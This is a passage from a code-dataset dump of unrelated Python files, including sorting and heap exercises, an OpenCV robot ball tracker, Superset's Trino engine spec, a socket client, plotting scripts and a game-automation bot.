\"outFileName\".\n \n * Duplicate results are omitted *\n '''\n print(f\"Input file = {inFileName}, Output file = {outFileName}.\\n\")\n f = open(inFileName, 'r')\n fileRows = f.readlines()\n f.close()\n \n outputRows = \"\"\n for row in fileRows:\n for ch in row.rstrip(): # rstrip() removes \\n at the end of a row\n if ch.isalpha(): # isalpha() returns true if a character is an alphabet\n break\n else: # if we did not break out of the inner for loop, this else is executed\n if row.strip(): # this filters out empty rows\n outputRows += row\n\n numberList = [int(x) for x in outputRows.split()] # converting string to list of int\n try:\n target = numberList.pop(0) # getting the \"target\"\n except:\n print(\"There are no numbers in the file.\")\n return f\"SumOfK({inFileName}, {outFileName}) failed.\"\n \n \n sortedList = heapSort(numberList)\n outputRows += \" \".join(map(str, sortedList)) +\"\\n\" # will be written to output file\n g = open(outFileName, 'w')\n for row in outputRows:\n print(row, end='') # printing output\n g.write(row) \n \n outputRows = \"\" # reset outputRows \n foundSolution = False # Keep tracking of if we found solution\n\n # Initialize the 2 pointers\n pointer1 = 0\n pointer2 = len(sortedList)-1\n \n # Initialize the repeat number catcher\n previousNumber1 = None\n previousNumber2 = None\n \n # Iterate over numbers with pointers looking for sum == target\n while pointer2>pointer1:\n if previousNumber1 == sortedList[pointer1]: #skips repeat number\n pointer1 += 1\n continue # restarts while loop after moving pointer \n elif previousNumber2 == sortedList[pointer2]: #skips repeat number\n pointer2 -= 1\n continue \n else:\n if sortedList[pointer1]*2 == target: # found a number x 2 == target\n foundSolution = True\n outputRows += f\"{sortedList[pointer1]}+{sortedList[pointer1]}\\n\"\n previousNumber1 = sortedList[pointer1]\n pointer1 += 1\n continue\n elif sortedList[pointer2]*2 == target: # found a number x 2 == target\n foundSolution = True\n outputRows += f\"{sortedList[pointer2]}+{sortedList[pointer2]}\\n\"\n previousNumber2 = sortedList[pointer2]\n pointer2 -= 1\n continue\n elif sortedList[pointer1] + sortedList[pointer2] > target: # no match\n pointer2 -= 1\n continue\n elif sortedList[pointer1] + sortedList[pointer2] < target: # no match\n pointer1 += 1\n continue\n else: # found sum of two numbers == target\n foundSolution = True\n outputRows += f\"{sortedList[pointer1]}+{sortedList[pointer2]}\\n\"\n pointer2 -= 1\n pointer1 += 1\n\n if foundSolution:\n outputRows = \"Yes\\n\" + outputRows\n else:\n outputRows = \"No\\n\" + outputRows\n \n # Finish writing to output file.\n for row in outputRows:\n g.write(row)\n g.close()\n print(outputRows)\n \n return f\"Heapsort Version SumOfK({inFileName}, {outFileName}) complete.\"\n\n\ndef maxHeap(array, size, startIndex):\n '''\n array = name of array/list\n size = size of array to max-heapify\n startIndex = Index of array to max-heapify\n \n This function uses recursion to create a Max Heap\n '''\n\n largestIntIndex = startIndex # the parent node we are investigating\n leftIndex = 2*startIndex + 1 # left child index\n rightIndex = 2*startIndex + 2 # right child index\n \n if size > leftIndex and array[leftIndex] > array[largestIntIndex]:\n largestIntIndex = leftIndex\n\n if size > rightIndex and array[rightIndex] > array[largestIntIndex]:\n largestIntIndex = rightIndex\n\n if largestIntIndex != startIndex: # swapping parent node with largest child\n array[largestIntIndex], array[startIndex] = array[startIndex], array[largestIntIndex]\n \n # after swapping, we now check the child that we swapped, as the parent\n maxHeap(array, size, largestIntIndex) \n \ndef heapSort(array):\n '''\n array = name of array to be sorted\n \n Making use of MaxHeap function, this function sorts an array in ascending order.\n O(nlog(n))\n '''\n size = len(array)\n startIndex = size//2 - 1 # this finds start of the non-leaf indexes\n \n # This builds the first Max Heap\n for i in range(startIndex, -1, -1): \n maxHeap(array, size, i)\n \n # This 'deletes' the largest number from heap each time and store it in the last index\n for i in range(size-1, 0, -1):\n array[i], array[0] = array[0], array[i] # swaps root (largest) with last leaf\n maxHeap(array, i, 0) # remake the Max Heap\n return array\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"csc255/Lab1_Cheah/Lab1_Cheah.py","file_name":"Lab1_Cheah.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131451850","text":"# 堆排序应用:\n# 设计一个数据结构,可动态地维护一组数据,且支持如下操作:\n# (1)添加元素\n# (2)返回这组数据中的中位数 findMedian()\n\ndef build_maxheap(list):\n heapSize = len(list)\n if heapSize < 2:\n return\n for i in range(int(heapSize/2)-1, -1, -1):\n maxHeapify(list, heapSize, i)\n\ndef build_minheap(list):\n heapSize = len(list)\n if heapSize < 2:\n return\n for i in range(int(heapSize/2)-1, -1, -1):\n minHeapify(list, heapSize, i)\n\ndef maxHeapify(list, heapSize, i):\n left = 2 * i + 1\n right = left + 1\n maxIndex = i\n if left < heapSize:\n if list[left] > list[i]:\n maxIndex = left\n if right < heapSize and list[maxIndex] < list[right]:\n maxIndex = right\n if maxIndex != i:\n list[maxIndex], list[i] = list[i], list[maxIndex]\n maxHeapify(list, heapSize, maxIndex)\n\ndef minHeapify(list, heapSize, i):\n left = 2 * i + 1\n right = left + 1\n minIndex = i\n if left < heapSize:\n if list[left] < list[i]:\n minIndex = left\n if right < heapSize and list[minIndex] > list[right]:\n minIndex = right\n if minIndex != i:\n list[minIndex], list[i] = list[i], list[minIndex]\n minHeapify(list, heapSize, minIndex)\n\ndef min_max_Heap(a, b, list):\n a.append(list.pop(0))\n b.append(list.pop(0))\n while (len(list)):\n data = list.pop(0)\n if a[0] < data:\n b.append(data)\n build_minheap(b)\n else:\n a.append(data)\n build_maxheap(a)\n if a[0] > b[0]:\n b[0], b[-1] = b[-1], b[0]\n a.append(b.pop())\n build_maxheap(a)\n build_minheap(b)\n if abs(len(a) - len(b)) > 1:\n if len(a) > len(b):\n a[0], a[-1] = a[-1], a[0]\n b.append(a.pop())\n build_maxheap(a)\n build_minheap(b)\n else:\n b[0], b[-1] = b[-1], b[0]\n a.append(b.pop())\n build_maxheap(a)\n build_minheap(b)\n\ndef find_median(list):\n a = []\n b = []\n min_max_Heap(a, b, list)\n if len(a) == len(b):\n return (a[0], b[0])\n elif len(a) > len(b):\n return a[0]\n else:\n return b[0]\n\n\nlist = [2, 1, 6, 0, 4, 8, 12, 3, 7]\nb = find_median(list)\nprint(b)\n\n\n\n \n\n \n\n\n\n\n\n","sub_path":"dir_sort/find_median.py","file_name":"find_median.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"356725664","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 17 17:09:49 2018\r\n\r\n@author: ntdx\r\n\"\"\"\r\n#import plot\r\nimport scipy.misc\r\nimport numpy as np\r\n\r\n\r\ndef imread(path, grayscale = False):\r\n if (grayscale):\r\n return scipy.misc.imread(path, flatten = True).astype(np.float)\r\n else:\r\n return scipy.misc.imread(path).astype(np.float)\r\n\r\ndef rgb2gray(rgb):\r\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\r\n\r\ndef width(lst):\r\n i=0\r\n for j in lst[0]:\r\n i=i+1\r\n return i\r\ndef AutoNorm(mat): \r\n n=len(mat)\r\n m= width(mat) \r\n MinNum=[9999999999]*m\r\n MaxNum = [0]*m \r\n for i in mat:\r\n for j in range(0,m):\r\n if i[j]>MaxNum[j]:\r\n MaxNum[j]=i[j]\r\n \r\n for p in mat: \r\n for q in range(0,m):\r\n if p[q]<=MinNum[q]:\r\n MinNum[q]=p[q] \r\n \r\n section=list(map(lambda x: x[0]-x[1], zip(MaxNum, MinNum)))\r\n #print section\r\n NormMat=[]\r\n \r\n for k in mat: \r\n \r\n distance=list(map(lambda x: x[0]-x[1], zip(k, MinNum)))\r\n value=list(map(lambda x: x[0]/x[1], zip(distance,section)))\r\n NormMat.append(value) \r\n return NormMat","sub_path":"tflib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"513553269","text":"import numpy as np\nimport imutils\nimport cv2\nimport time\n# import matplotlib.pyplot as plt\n\nclass bolaProcessing():\n\n try:\n def nothing(x):\n pass\n\n cv2.namedWindow('color_threshold')\n cv2.createTrackbar('b_low', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('g_low', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('r_low', 'color_threshold', 0, 255, nothing)\n \n cv2.createTrackbar('b_high', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('g_high', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('r_high', 'color_threshold', 0, 255, nothing)\n\n def __init__(self):\n # self.img = cv2.imread(img_Name)\n # self.camera = cv2.VideoCapture('D:\\NyeMan\\KULIAH\\Robotiik\\KRSBI BERODA\\Robot\\camera\\contoh_robot.mp4')\n #size(frame, width=600)\n # self.height, self.width, self.depth = self.img.shape\n self.color_upper = None\n self.color_lower = None\n self.mask = None\n # self.newPos = [0,0]\n self.oldPos = [0,0]\n self.luas = 0\n # self.width = 600\n self.titik_tengah = (159, 119)\n self.param_X = range(109, 209)\n self.param_Y = range(69, 169)\n self.waktu_awal = 0\n self.waktu_akhir = 0\n\n\n def prepareCamera(self):\n self.camera = cv2.VideoCapture(0)\n self.camera.isOpened()\n self.camera.set(3, 320)\n self.camera.set(4, 240)\n (grabbed, frame) = self.camera.read()\n # self.width = 600\n self.img = frame\n\n def getCamera(self):\n (grabbed, frame) = self.camera.read()\n self.img = frame\n # self.img = imutils.resize(frame, width=self.width)\n #if(self.img is None):\n # self.prepareCamera()\n # self.blurred = self.img.copy()\n self.waktu_awal = time.time()\n\n def getValueColor(self):\n R_LOW = cv2.getTrackbarPos('r_low', 'color_threshold')\n G_LOW = cv2.getTrackbarPos('g_low', 'color_threshold')\n B_LOW = cv2.getTrackbarPos('b_low', 'color_threshold')\n R_HIGH = cv2.getTrackbarPos('r_high', 'color_threshold')\n G_HIGH = cv2.getTrackbarPos('g_high', 'color_threshold')\n B_HIGH = cv2.getTrackbarPos('b_high', 'color_threshold')\n self.color_lower = np.array([B_LOW, G_LOW, R_LOW])\n self.color_upper = np.array([B_HIGH, G_HIGH, R_HIGH])\n #self.color_lower = np.array([3, 140, 187])\n #self.color_upper = np.array([231, 231, 255])\n\n def binaryThres(self):\n self.thresh = cv2.threshold(self.blurred, 60, 255, cv2.THRESH_BINARY)[1]\n \n def displayMask(self):\n cv2.imshow('mask', self.mask)\n \n \n def displayImg(self):\n #cv2.line(self.img, self.titik_tengah, self.param_X, (0,255,0), 2)\n #cv2.line(self.img, self.titik_tengah, self.param_Y, (0,255,0), 2)\n cv2.imshow('Img', self.img)\n\n def displayImgCopy(self):\n #cv2.circle(self.imgCopy, (159,119), 7, (255, 0, 80), -1)\n #cv2.circle(self.imgCopy, (69,169), 7, (90, 255 ,60), -1)\n #cv2.circle(self.imgCopy, (159,119), 7, (0, 100, 255), -1)\n cv2.imshow('ImgCopy', self.imgCopy) \n \n def displayBinaryThresh(self):\n cv2.imshow('Binary', self.thresh)\n\n def maskProcessing(self):\n self.hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV)\n # self.gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)\n #img = cv2.GaussianBlur(self.hsv, (5, 5), 1)\n self.blurred = cv2.blur(self.hsv,(5,5))\n #self.blurred = cv2.medianBlur(self.hsv,10)\n kernel = np.ones((5,5),np.uint8)\n mask = cv2.inRange(self.hsv, self.color_lower, self.color_upper)\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n self.mask = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\n # self.mask = cv2.Canny(self.img,self.thr_canny1,self.thr_canny2)\n \n\n def stopProg(self):\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n cv2.destroyAllWindows()\n return 0\n else:\n return 1\n \n\n def findContour(self):\n self.contours = cv2.findContours(self.mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n self.cnts = self.contours[0] if imutils.is_cv2() else self.contours[1]\n\n def drawContour(self, c):\n cv2.drawContours(self.imgCopy,self.cnts,-1,(0,255,255),-1)\n\n def findCenterPoint(self):\n self.imgCopy = self.img.copy()\n Temp = 0\n M = 0\n \n for c in self.cnts:\n area = cv2.contourArea(c)\n if( Temp < area):\n Temp = area\n self.cnts = c\n M = cv2.moments(c)\n if self.luas ==0 and len(self.cnts)>0:\n self.luas = cv2.contourArea(self.cnts)\n if M != 0:\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n # self.newPos = [cX, cY]\n self.getDirection([cX, cY], cv2.contourArea(self.cnts))\n # self.oldPos = [cX, cY]\n # self.getJarak(M[\"m00\"])\n self.getAction()\n cv2.drawContours(self.imgCopy,self.cnts,-1,(0,255,255),-1)\n cv2.circle(self.imgCopy, (cX, cY), 7, (200, 200, 160), -1)\n #cv2.putText(self.imgCopy, \"center\", (cX - 20, cY - 20),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (120, 120, 120), 2)\n\n \n def getAction(self):\n \n if(self.oldPos[0] in self.param_X and self.oldPos[1] in self.param_Y):\n print (\"sudah ditengah\")\n return [0,0]\n else:\n if self.oldPos[0] < self.titik_tengah[0]-50 and self.oldPos[1] < self.titik_tengah[1]-50:\n print (\"bola di pojok kiri atas - robot gerak ke kiri kemudian maju\")\n return [-1,1]\n elif self.oldPos[0] < self.titik_tengah[0]-50 and self.oldPos[1] > self.titik_tengah[1]+50:\n print (\"bola di pojok kiri bawah - robot gerak ke kiri kemudian mundur\")\n return [-1,-1]\n elif self.oldPos[0] > self.titik_tengah[0]+50 and self.oldPos[1] > self.titik_tengah[1]+50:\n print (\"bola di pojok kanan bawah - robot gerak ke kanan kemudian mundur\")\n return [1,-1]\n elif self.oldPos[0] > self.titik_tengah[0]+50 and self.oldPos[1] < self.titik_tengah[1]-50:\n print (\"bola di pojok kanan atas - robot gerak ke kanan kemudian maju\")\n return [1,1]\n elif self.oldPos[0] < self.titik_tengah[0]-50 and self.oldPos[1] in self.param_Y:\n print (\"bola di kiri - robot gerak ke kiri\")\n return [-1,0]\n elif self.oldPos[0] > self.titik_tengah[0]+50 and self.oldPos[1] in self.param_Y:\n print (\"bola di kanan - robot gerak ke kanan\")\n return [1,0]\n elif self.oldPos[0] in self.param_X and self.oldPos[1] < self.titik_tengah[1]-50:\n print (\"bola di atas - robot gerak maju\")\n return [0,1]\n elif self.oldPos[0] in self.param_X and self.oldPos[1] > self.titik_tengah[1]+20:\n print (\"bola di bawah - robot gerak mundur\")\n return [0,-1]\n\n def getPosition(self):\n print(self.newPos)\n\n def getReadyKick(self):\n if( self.newPos[0] <= int(self.width/2 + 15) and self.newPos[0] >= int(self.width/2 - 15) ):\n print(\"Kick!!\")\n else:\n print(\"Don't kick yet!!\")\n\n def getDirection(self, newPos, candidateLuas):\n # pos_TEMP = [self.oldPos[0] - self.newPos[0], self.oldPos[1] - self.newPos[1]]\n self.waktu_akhir = time.time()\n pos_TEMP = [self.oldPos[0] - newPos[0], self.oldPos[1] - newPos[1]]\n selisih = ((pos_TEMP[0]*(0.1))**2+(pos_TEMP[1]*(0.1))**2)**(0.5)\n kec = selisih/(self.waktu_akhir-self.waktu_awal)\n print(\"kecepatan : \",kec) \n if(pos_TEMP[0] > 0 and pos_TEMP[1]>0):\n print( \"gerak ke kiri atas\")\n elif (pos_TEMP[0] < 0 and pos_TEMP[1]<0):\n print( \"gerak ke kanan bawah\")\n elif (pos_TEMP[0] > 0 and pos_TEMP[1]<0):\n print( \"gerak ke kiri bawah\")\n elif (pos_TEMP[0] < 0 and pos_TEMP[1]>0):\n print( \"gerak ke kanan atas\")\n elif (pos_TEMP[0] < 0 and pos_TEMP[1]==0):\n print( \"gerak ke kanan\")\n elif (pos_TEMP[0] > 0 and pos_TEMP[1]==0):\n print( \"gerak ke kiri\")\n elif (pos_TEMP[0] == 0 and pos_TEMP[1]>0):\n print( \"gerak ke atas\")\n elif (pos_TEMP[0] == 0 and pos_TEMP[1]<0):\n print( \"gerak ke bawah\")\n else:\n print( \"Diam\")\n if self.luas > candidateLuas:\n #cv2.putText(self.imgCopy, \"menjauh\", (100, 100),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 200), 2)\n print(\"menjauh\")\n else :\n print(\"mendekat\")\n #cv2.putText(self.imgCopy, \"mendekat\", (100, 100),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 200), 2)\n self.luas = candidateLuas\n self.oldPos = newPos\n #cv2.putText(self.imgCopy, direction, (20, 20),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (120, 120, 120), 2)\n\n except:\n print (\"camera error\")\n\n","sub_path":"Beroda/bolaProcessing.py","file_name":"bolaProcessing.py","file_ext":"py","file_size_in_byte":10034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284533467","text":"from . import web\nfrom flask import render_template,request,redirect,url_for,flash\n\nlist1 = [{\"a\":1,\"b\":2},{\"a\":3,\"b\":4}]\n\n@web.route('/test',methods=['get','post'])\ndef Test():\n for i in list1:\n print(i['a'],i['b'])\n return \"test\"\n ","sub_path":"app/web/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350720336","text":"import xgboost as xgb\nimport pickle\nimport pandas as pd\nimport os\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\nmodel = pickle.load(open(\"xgb_model.pickle\", \"rb\"))\n\ntestset_X = pd.read_csv(BASE_DIR + '/processed/X_test_processed.csv')\n\ntestset_X = testset_X.drop(\"(紹介予定)雇用形態備考_アルバイト社員\", axis=1)\n\ntest_X = testset_X.iloc[:, 1:].values\n\ntestset = xgb.DMatrix(test_X)\nmy_pred = pd.DataFrame()\nmy_pred[\"お仕事No.\"] = testset_X.iloc[:, 0]\nmy_pred[\"応募数 合計\"] = model.predict(testset)\nmy_pred.to_csv(BASE_DIR + '/final_result/final_result.csv', index=False)\n\n\n","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330063948","text":"a=eval(input(\"enter any number to check perfect or not\"))\ni=1\n\nn=a\nsum=0\nwhile i Optional[str]:\n \"\"\"\n Convert a Python `datetime` object to a SQL expression.\n\n :param target_type: The target type of expression\n :param dttm: The datetime object\n :param db_extra: The database extra object\n :return: The SQL expression\n\n Superset only defines time zone naive `datetime` objects, though this method\n handles both time zone naive and aware conversions.\n \"\"\"\n tt = target_type.upper()\n if tt == utils.TemporalType.DATE:\n return f\"DATE '{dttm.date().isoformat()}'\"\n if tt in (\n utils.TemporalType.TIMESTAMP,\n utils.TemporalType.TIMESTAMP_WITH_TIME_ZONE,\n ):\n return f\"\"\"TIMESTAMP '{dttm.isoformat(timespec=\"microseconds\")}'\"\"\"\n return None\n\n @classmethod\n def epoch_to_dttm(cls) -> str:\n return \"from_unixtime({col})\"\n\n @classmethod\n def adjust_database_uri(\n cls, uri: URL, selected_schema: Optional[str] = None\n ) -> None:\n database = uri.database\n if selected_schema and database:\n selected_schema = parse.quote(selected_schema, safe=\"\")\n database = database.split(\"/\")[0] + \"/\" + selected_schema\n uri.database = database\n\n @classmethod\n def update_impersonation_config(\n cls,\n connect_args: Dict[str, Any],\n uri: str,\n username: Optional[str],\n ) -> None:\n \"\"\"\n Update a configuration dictionary\n that can set the correct properties for impersonating users\n :param connect_args: config to be updated\n :param uri: URI string\n :param username: Effective username\n :return: None\n \"\"\"\n url = make_url_safe(uri)\n backend_name = url.get_backend_name()\n\n # Must be Trino connection, enable impersonation, and set optional param\n # auth=LDAP|KERBEROS\n # Set principal_username=$effective_username\n if backend_name == \"trino\" and username is not None:\n connect_args[\"user\"] = username\n\n @classmethod\n def modify_url_for_impersonation(\n cls, url: URL, impersonate_user: bool, username: Optional[str]\n ) -> None:\n \"\"\"\n Modify the SQL Alchemy URL object with the user to impersonate if applicable.\n :param url: SQLAlchemy URL object\n :param impersonate_user: Flag indicating if impersonation is enabled\n :param username: Effective username\n \"\"\"\n # Do nothing and let update_impersonation_config take care of impersonation\n\n @classmethod\n def get_allow_cost_estimate(cls, extra: Dict[str, Any]) -> bool:\n return True\n\n @classmethod\n def estimate_statement_cost(cls, statement: str, cursor: Any) -> Dict[str, Any]:\n \"\"\"\n Run a SQL query that estimates the cost of a given statement.\n\n :param statement: A single SQL statement\n :param cursor: Cursor instance\n :return: JSON response from Trino\n \"\"\"\n sql = f\"EXPLAIN (TYPE IO, FORMAT JSON) {statement}\"\n cursor.execute(sql)\n\n # the output from Trino is a single column and a single row containing\n # JSON:\n #\n # {\n # ...\n # \"estimate\" : {\n # \"outputRowCount\" : 8.73265878E8,\n # \"outputSizeInBytes\" : 3.41425774958E11,\n # \"cpuCost\" : 3.41425774958E11,\n # \"maxMemory\" : 0.0,\n # \"networkCost\" : 3.41425774958E11\n # }\n # }\n result = json.loads(cursor.fetchone()[0])\n return result\n\n @classmethod\n def query_cost_formatter(\n cls, raw_cost: List[Dict[str, Any]]\n ) -> List[Dict[str, str]]:\n \"\"\"\n Format cost estimate.\n\n :param raw_cost: JSON estimate from Trino\n :return: Human readable cost estimate\n \"\"\"\n\n def humanize(value: Any, suffix: str) -> str:\n try:\n value = int(value)\n except ValueError:\n return str(value)\n\n prefixes = [\"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\", \"Y\"]\n prefix = \"\"\n to_next_prefix = 1000\n while value > to_next_prefix and prefixes:\n prefix = prefixes.pop(0)\n value //= to_next_prefix\n\n return f\"{value} {prefix}{suffix}\"\n\n cost = []\n columns = [\n (\"outputRowCount\", \"Output count\", \" rows\"),\n (\"outputSizeInBytes\", \"Output size\", \"B\"),\n (\"cpuCost\", \"CPU cost\", \"\"),\n (\"maxMemory\", \"Max memory\", \"B\"),\n (\"networkCost\", \"Network cost\", \"\"),\n ]\n for row in raw_cost:\n estimate: Dict[str, float] = row.get(\"estimate\", {})\n statement_cost = {}\n for key, label, suffix in columns:\n if key in estimate:\n statement_cost[label] = humanize(estimate[key], suffix).strip()\n cost.append(statement_cost)\n\n return cost\n\n @staticmethod\n def get_extra_params(database: \"Database\") -> Dict[str, Any]:\n \"\"\"\n Some databases require adding elements to connection parameters,\n like passing certificates to `extra`. This can be done here.\n\n :param database: database instance from which to extract extras\n :raises CertificateException: If certificate is not valid/unparseable\n \"\"\"\n extra: Dict[str, Any] = BaseEngineSpec.get_extra_params(database)\n engine_params: Dict[str, Any] = extra.setdefault(\"engine_params\", {})\n connect_args: Dict[str, Any] = engine_params.setdefault(\"connect_args\", {})\n\n if database.server_cert:\n connect_args[\"http_scheme\"] = \"https\"\n connect_args[\"verify\"] = utils.create_ssl_cert_file(database.server_cert)\n\n return extra\n\n @staticmethod\n def update_encrypted_extra_params(\n database: \"Database\", params: Dict[str, Any]\n ) -> None:\n if not database.encrypted_extra:\n return\n try:\n encrypted_extra = json.loads(database.encrypted_extra)\n auth_method = encrypted_extra.pop(\"auth_method\", None)\n auth_params = encrypted_extra.pop(\"auth_params\", {})\n if not auth_method:\n return\n\n connect_args = params.setdefault(\"connect_args\", {})\n connect_args[\"http_scheme\"] = \"https\"\n # pylint: disable=import-outside-toplevel\n if auth_method == \"basic\":\n from trino.auth import BasicAuthentication as trino_auth # noqa\n elif auth_method == \"kerberos\":\n from trino.auth import KerberosAuthentication as trino_auth # noqa\n elif auth_method == \"jwt\":\n from trino.auth import JWTAuthentication as trino_auth # noqa\n else:\n allowed_extra_auths = current_app.config[\n \"ALLOWED_EXTRA_AUTHENTICATIONS\"\n ].get(\"trino\", {})\n if auth_method in allowed_extra_auths:\n trino_auth = allowed_extra_auths.get(auth_method)\n else:\n raise ValueError(\n f\"For security reason, custom authentication '{auth_method}' \"\n f\"must be listed in 'ALLOWED_EXTRA_AUTHENTICATIONS' config\"\n )\n\n connect_args[\"auth\"] = trino_auth(**auth_params)\n except json.JSONDecodeError as ex:\n logger.error(ex, exc_info=True)\n raise ex\n","sub_path":"superset/db_engine_specs/trino.py","file_name":"trino.py","file_ext":"py","file_size_in_byte":9866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"384861468","text":"from dragon import Dragon\n\n\nSERVER = \"52.79.237.101\"\n\n\ndef main():\n sock = Dragon(SERVER, 6000)\n sock.bind(('', 7000))\n\n data = b''\n\n while True:\n try:\n tmp = sock.recv(1500)\n except KeyboardInterrupt:\n open(\"dragon_recv_frame\", \"wb\").write(data)\n break\n if not tmp:\n break\n data += tmp\n\n # sock.send(b'Hello world!')\n\n sock.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427445239","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 00:27:27 2021\nSQLite + panda - https://datacarpentry.org/python-ecology-lesson/09-working-with-sql/index.html\nhttps://towardsdatascience.com/python-pandas-and-sqlite-a0e2c052456f\n\n@author: Eilham\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport sqlite3\nplt.style.use('seaborn') \n\n#==============SQLITE setup/connection =======================================\n\n# creating connection with existing table\nconn = sqlite3.connect('test_9.db')\n\n\n\n# creating panda dataFrame from table\ndf = pd.read_sql_query('SELECT * FROM SENSOR_TABLE', conn)\n\n# taking column 'time, accel' from database and assigning it onto a variable\ntime = df['TIME']\naccel_x = df['ACCEL_X']\naccel_y = df['ACCEL_Y']\naccel_z = df['ACCEL_Z']\n\n# setting up subplots ( 3 rows and 1 column)\nfig, (ax1, ax2, ax3) = plt.subplots(nrows = 3 , ncols = 1)\n\n\n\n# i added something here\n\n\n# plotting the points and adding artistic stuff\nax1.plot(time, accel_x, color='b', linewidth = 1, label= 'x-axis')\nax2.plot(time, accel_y, color='g', linewidth = 1, label = 'y-axis')\nax3.plot(time, accel_z, color='r', linewidth = 1, label = 'z-axis')\n\n#===========SUBPLOT #1 ====================================================\n\n# enabling legends\nax1.legend()\n\n\n# label x and y axis\nax1.set_xlabel('Time (hh:mm:ss)')\nax1.set_ylabel('Accelerometer')\n\n# put the title\nax1.set_title('Accelerometer Readings')\n\n#===========SUBPLOT #2 ====================================================\n# enabling legends\nax2.legend()\n\n\n# label x and y axis\nax2.set_xlabel('Time (hh:mm:ss)')\nax2.set_ylabel('Accelerometer')\n\n# put the title\nax2.set_title('Accelerometer Readings')\n\n#===========SUBPLOT #3 ====================================================\n# enabling legends\nax3.legend()\n\n\n# label x and y axis\nax3.set_xlabel('Time (hh:mm:ss)')\nax3.set_ylabel('Accelerometer')\n\n# put the title\nax3.set_title('Accelerometer Readings')\n\n\n\n\n# enable grid (altho seaborn dah ada grid)\n#plt.grid(True)\n\n# tight layout to keep the shape consistent\nplt.tight_layout()\n\n# actually show the plot on the screen\nplt.show()\n\n# close the opened connection\nconn.close()","sub_path":"Data_graph_pandas_subPlots.py","file_name":"Data_graph_pandas_subPlots.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"58424283","text":"import pyautogui\nimport time\nimport re\nimport sys\nimport os\nimport operator\n\nfrom actors.ActorTemplate import ActorTemplate\nfrom actors.utilities.save_helper.MagicQuarterSaveHelper import MagicQuarterSaveHelper\n\nclass MagicQuarter2(ActorTemplate):\n\n # Initializing Object\n def __init__(self, bot):\n super(MagicQuarter2, self).__init__(bot)\n self.game_bot = bot\n self.save_helper = MagicQuarterSaveHelper(bot)\n self.magic_quarter_regions = bot.screenshot_data.data[\"magic_quarter\"]\n\n self.battle_screen = bot.data[\"battle\"]\n self.town_screen = bot.data[\"town\"]\n self.magic_screen = bot.data[\"magic_quarter\"]\n\n self.points = {\n \"upgrade\": {\"x\": 1230, \"y\": 810},\n \"close\": {\"x\": 1840, \"y\": 50},\n }\n \n def runMagicQuarterCheck(self):\n pyautogui.press('g')\n time.sleep(0.5)\n in_menu = self.menuCheck(\"MagicQuarter\", self.game_bot)\n if in_menu:\n self.game_bot.click(self.points[\"upgrade\"])\n time.sleep(0.5)\n self.game_bot.click(self.points[\"close\"])\n time.sleep(0.5)\n else:\n print(\"Did not find Magic quarter menu\")\n \n def startDuties(self):\n self.loadData()\n instructions = self.instructions\n coordinates = self.coordinates\n needs_visit = instructions[\"magic_quarter\"][\"needs_upgrade\"]\n\n if needs_visit:\n self.enterMagicQuarterZone()\n time.sleep(1)\n self.processMagicQuarterQueue()\n self.returnToBattleScreen()\n\n def enterMagicQuarterZone(self):\n bot = self.game_bot\n\n bot.click(self.battle_screen[\"icons\"][\"town\"])\n bot.click(self.town_screen[\"icons\"][\"magic_quarter\"])\n\n def processMagicQuarterQueue(self):\n bot = self.game_bot\n screenshot_helper = bot.screenshot_helper\n instructions = self.instructions[\"magic_quarter\"]\n coordinates = self.coordinates\n server = instructions[\"server\"]\n\n guardian_slot = instructions[\"upgrade_info\"][\"guardian_slot\"]\n guardian_point = coordinates[guardian_slot]\n train_point = coordinates[\"train\"]\n magic_timer = self.magic_quarter_regions[\"magic_quarter_timer\"]\n\n bot.click(guardian_point)\n time_for_upgrade = screenshot_helper.getScreenshotTime(magic_timer)\n bot.click(train_point)\n\n data = {\n \"time_for_upgrade\": str(time_for_upgrade)\n }\n self.saveProgress(data)\n\n def 